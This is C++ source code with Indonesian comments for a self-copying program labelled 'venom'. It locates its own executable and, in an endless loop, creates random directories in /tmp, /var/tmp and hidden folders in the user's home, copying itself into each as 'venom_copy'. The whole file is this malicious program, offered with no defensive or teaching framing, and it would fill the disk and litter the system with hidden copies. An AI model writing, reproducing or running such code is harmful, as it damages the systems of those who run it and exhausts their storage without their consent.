#include <iostream>
#include <fstream>
#include <string>
#include <unistd.h>     // Untuk readlink()
#include <sys/stat.h>   // Untuk mkdir()
#include <cstdlib>      // Untuk rand()
#include <ctime>        // Untuk seed generator acak

// Fungsi untuk menghasilkan jalur direktori acak
std::string get_random_directory() {
    // Pilihan direktori target
    std::string directories[] = {
        "/tmp/venom_dir_",
        "/var/tmp/venom_dir_",
        std::string(getenv("HOME")) + "/.venom_dir_"
    };

    // Pilih direktori secara acak
    int dir_index = rand() % 3;

    // Tambahkan angka acak ke nama direktori
    int random_number = rand() % 10000;
    return directories[dir_index] + std::to_string(random_number);
}

int main() {
    // Inisialisasi generator angka acak
    srand(time(0));

    // Dapatkan nama file eksekusi
    char buffer[1024];
    ssize_t len = readlink("/proc/self/exe", buffer, sizeof(buffer) - 1);
    if (len == -1) {
        return 1; // Gagal mendapatkan nama file eksekusi
    }
    buffer[len] = '\0'; // Tambahkan null terminator

    std::string self_filename(buffer);

    // Loop tanpa henti untuk menyebarkan salinan
    while (true) {
        // Tentukan direktori target secara acak
        std::string target_dir = get_random_directory();
        mkdir(target_dir.c_str(), 0700); // Buat direktori jika belum ada

        // Tentukan nama file salinan
        std::string copy_filename = target_dir + "/venom_copy";

        // Buka file eksekusi untuk membaca
        std::ifstream self_file(self_filename, std::ios::binary);
        if (!self_file) {
            return 1; // Gagal membuka file eksekusi
        }

        // Buat file baru untuk salinan
        std::ofstream copy_file(copy_filename, std::ios::binary);
        if (!copy_file) {
            return 1; // Gagal membuat file salinan
        }

        // Salin isi file
        copy_file << self_file.rdbuf();

        // Tutup file
        self_file.close();
        copy_file.close();
    }

    return 0;
}
